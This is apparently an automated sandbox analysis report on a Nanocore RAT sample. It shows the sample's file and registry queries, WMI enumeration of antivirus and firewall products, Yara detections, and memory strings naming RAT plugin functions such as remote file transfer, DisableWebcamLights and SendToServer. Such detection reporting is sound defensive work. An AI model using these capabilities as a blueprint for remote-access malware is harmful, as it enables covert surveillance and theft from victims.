    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Users\user\Desktop\p9Ts9VV2NZ.exe VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Users\Public\Documents\???????????????\svchost.exe VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Users\Public\Documents\???????????????\svchost.exe VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Users\Public\Documents\???????????????\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

    Stealing of Sensitive Information:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c56c41.19.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c4d7e2.20.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTR

    Remote Access Functionality:

    barindex
    Detected Nanocore RatShow sources
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
